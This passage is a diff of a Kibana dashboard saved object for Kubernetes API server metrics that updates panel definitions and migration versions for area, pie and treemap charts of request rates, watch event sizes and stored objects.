"kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.apiserver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.apiserver" - } - } - } - ], + "id": "kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MywyXQ==", + "attributes": { + "description": "Kubernetes API server metrics", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.apiserver" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.apiserver" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "darkTheme": false, + "hidePanelTitles": false, + "useMargins": false + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "d79ccab2-4cce-4e41-ae01-434914884a5f", + "w": 48, + "x": 0, + "y": 0 + }, + "panelIndex": "d79ccab2-4cce-4e41-ae01-434914884a5f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "darkTheme": false, - "hidePanelTitles": false, - "useMargins": false + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "9db496f9-079b-4ddd-b517-cec815a7e9cb", + "w": 24, + "x": 0, + "y": 5 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "9db496f9-079b-4ddd-b517-cec815a7e9cb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8df21ece-205d-4542-bec9-e381eca92895": { + "columnOrder": [ + "cff4229b-4050-47ef-bb61-9790c5596064", + "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" + ], + "columns": { + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Rate of Apiserver Requests", + "operationType": "formula", + "params": { + "formula": "counter_rate(max(kubernetes.apiserver.request.count))", + "isFormulaBroken": false + }, + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "description": "", - "id": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate of Apiserver Requests", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.request.count" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 5, - "i": "d79ccab2-4cce-4e41-ae01-434914884a5f", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "d79ccab2-4cce-4e41-ae01-434914884a5f", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8df21ece-205d-4542-bec9-e381eca92895": { - "columnOrder": [ - "cff4229b-4050-47ef-bb61-9790c5596064", - "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" - ], - "columns": { - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Rate of Apiserver Requests", - "operationType": "formula", - "params": { - "formula": "counter_rate(max(kubernetes.apiserver.request.count))", - "isFormulaBroken": false - }, - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate of Apiserver Requests", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.request.count" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate of Apiserver Requests", - "operationType": "counter_rate", - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "42b0785e-95e8-4538-8cc5-b1771f663c0c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 50 values of kubernetes.apiserver.request.resource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 50 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.resource" - }, - "cff4229b-4050-47ef-bb61-9790c5596064": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate of Apiserver Requests", + "operationType": "counter_rate", + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "42b0785e-95e8-4538-8cc5-b1771f663c0c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 50 values of kubernetes.apiserver.request.resource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" - ], - "layerId": "8df21ece-205d-4542-bec9-e381eca92895", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 50 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.resource" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "cff4229b-4050-47ef-bb61-9790c5596064": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 21, - "i": "9db496f9-079b-4ddd-b517-cec815a7e9cb", - "w": 24, - "x": 0, - "y": 5 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "9db496f9-079b-4ddd-b517-cec815a7e9cb", - "title": "Apiserver Requests Rate per Resource [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8df21ece-205d-4542-bec9-e381eca92895": { - "columnOrder": [ - "cff4229b-4050-47ef-bb61-9790c5596064", - "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" - ], - "columns": { - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Watch Events Size in Bytes", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", - "isFormulaBroken": false - }, - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" - ], - "scale": "ratio" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Watch Events Size in Bytes", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.watch.events.size.bytes.sum" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Watch Events Size in Bytes", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.watch.events.size.bytes.count" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Watch Events Size in Bytes", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" - ], - "location": { - "max": 109, - "min": 0 - }, - "name": "divide", - "text": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", - "type": "function" - } - }, - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" - ], - "scale": "ratio" - }, - "42b0785e-95e8-4538-8cc5-b1771f663c0c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 50 values of kubernetes.apiserver.watch.events.kind", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 50 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.watch.events.kind" - }, - "cff4229b-4050-47ef-bb61-9790c5596064": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" - ], - "layerId": "8df21ece-205d-4542-bec9-e381eca92895", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 21, - "i": "97d844d4-e990-444a-8b94-34aa4dcd64cc", - "w": 24, - "x": 24, - "y": 5 + "layers": [ + { + "accessors": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" + ], + "layerId": "8df21ece-205d-4542-bec9-e381eca92895", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "97d844d4-e990-444a-8b94-34aa4dcd64cc", - "title": "Apiserver Watch Events Size per Kind [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "aba71622-b1dc-4b3c-b7c0-c9212af90472": { - "columnOrder": [ - "f66894ae-0dbb-4132-838b-04725a5ae7bf", - "cad0c9f5-09c6-405b-8801-5177891c830a" - ], - "columns": { - "cad0c9f5-09c6-405b-8801-5177891c830a": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.apiserver.etcd.object.count: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.apiserver.etcd.object.count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.etcd.object.count" - }, - "f66894ae-0dbb-4132-838b-04725a5ae7bf": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.apiserver.request.resource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "cad0c9f5-09c6-405b-8801-5177891c830a", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.resource" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Apiserver Requests Rate per Resource [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "97d844d4-e990-444a-8b94-34aa4dcd64cc", + "w": 24, + "x": 24, + "y": 5 + }, + "panelIndex": "97d844d4-e990-444a-8b94-34aa4dcd64cc", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8df21ece-205d-4542-bec9-e381eca92895": { + "columnOrder": [ + "cff4229b-4050-47ef-bb61-9790c5596064", + "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" + ], + "columns": { + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Watch Events Size in Bytes", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "aba71622-b1dc-4b3c-b7c0-c9212af90472", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "cad0c9f5-09c6-405b-8801-5177891c830a" - ], - "nestedLegend": false, - "numberDisplay": "value", - "primaryGroups": [ - "f66894ae-0dbb-4132-838b-04725a5ae7bf" - ] - } - ], - "shape": "pie" - } + "formula": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", + "isFormulaBroken": false + }, + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 23, - "i": "481678b8-e443-4433-ad15-b55eaab7c8f4", - "w": 24, - "x": 24, - "y": 26 - }, - "panelIndex": "481678b8-e443-4433-ad15-b55eaab7c8f4", - "title": "Apiserver Stored Objects per Resource [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-fc6561f2-f85f-4096-86df-ef5dcb95627c", - "type": "index-pattern" + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Watch Events Size in Bytes", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.watch.events.size.bytes.sum" + }, + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Watch Events Size in Bytes", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.watch.events.size.bytes.count" + }, + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Watch Events Size in Bytes", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" + ], + "location": { + "max": 109, + "min": 0 + }, + "name": "divide", + "text": "max(kubernetes.apiserver.watch.events.size.bytes.sum)/max(kubernetes.apiserver.watch.events.size.bytes.count)", + "type": "function" } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "fc6561f2-f85f-4096-86df-ef5dcb95627c": { - "columnOrder": [ - "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", - "a5d3264f-b070-4a5e-a62c-659c410e9a64", - "414b7d77-a53c-4043-9690-4e3b000980be" - ], - "columns": { - "2a873e10-31f0-4b48-abc0-5c2c0efa8aed": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.apiserver.request.subresource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.subresource" - }, - "414b7d77-a53c-4043-9690-4e3b000980be": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.apiserver.request.count: *" - }, - "isBucketed": false, - "label": "Last value of kubernetes.apiserver.request.count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.request.count" - }, - "a5d3264f-b070-4a5e-a62c-659c410e9a64": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.apiserver.request.resource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "414b7d77-a53c-4043-9690-4e3b000980be", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.resource" - } - }, - "incompleteColumns": {} - } - } - } + }, + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" + ], + "scale": "ratio" + }, + "42b0785e-95e8-4538-8cc5-b1771f663c0c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 50 values of kubernetes.apiserver.watch.events.kind", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "fc6561f2-f85f-4096-86df-ef5dcb95627c", - "layerType": "data", - "legendDisplay": "default", - "metrics": [ - "414b7d77-a53c-4043-9690-4e3b000980be" - ], - "nestedLegend": false, - "numberDisplay": "percent", - "primaryGroups": [ - "2a873e10-31f0-4b48-abc0-5c2c0efa8aed", - "a5d3264f-b070-4a5e-a62c-659c410e9a64" - ] - } - ], - "shape": "treemap" - } + "size": 50 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.watch.events.kind" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {}, - "hidePanelTitles": false + "cff4229b-4050-47ef-bb61-9790c5596064": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 23, - "i": "9f255e7f-b213-4719-9c00-eedc2a919e2c", - "w": 24, - "x": 0, - "y": 26 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "9f255e7f-b213-4719-9c00-eedc2a919e2c", - "title": "Apiserver Requests per Resource and SubResource [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] API server", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-05-11T17:40:45.917Z", - "id": "kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" + ], + "layerId": "8df21ece-205d-4542-bec9-e381eca92895", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "9db496f9-079b-4ddd-b517-cec815a7e9cb:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" + "title": "Apiserver Watch Events Size per Kind [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 23, + "i": "481678b8-e443-4433-ad15-b55eaab7c8f4", + "w": 24, + "x": 24, + "y": 26 }, - { - "id": "metrics-*", - "name": "97d844d4-e990-444a-8b94-34aa4dcd64cc:indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" + "panelIndex": "481678b8-e443-4433-ad15-b55eaab7c8f4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aba71622-b1dc-4b3c-b7c0-c9212af90472", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "aba71622-b1dc-4b3c-b7c0-c9212af90472": { + "columnOrder": [ + "f66894ae-0dbb-4132-838b-04725a5ae7bf", + "cad0c9f5-09c6-405b-8801-5177891c830a" + ], + "columns": { + "cad0c9f5-09c6-405b-8801-5177891c830a": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.apiserver.etcd.object.count: *" + }, + "isBucketed": false, + "label": "Last value of kubernetes.apiserver.etcd.object.count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.etcd.object.count" + }, + "f66894ae-0dbb-4132-838b-04725a5ae7bf": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.apiserver.request.resource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": 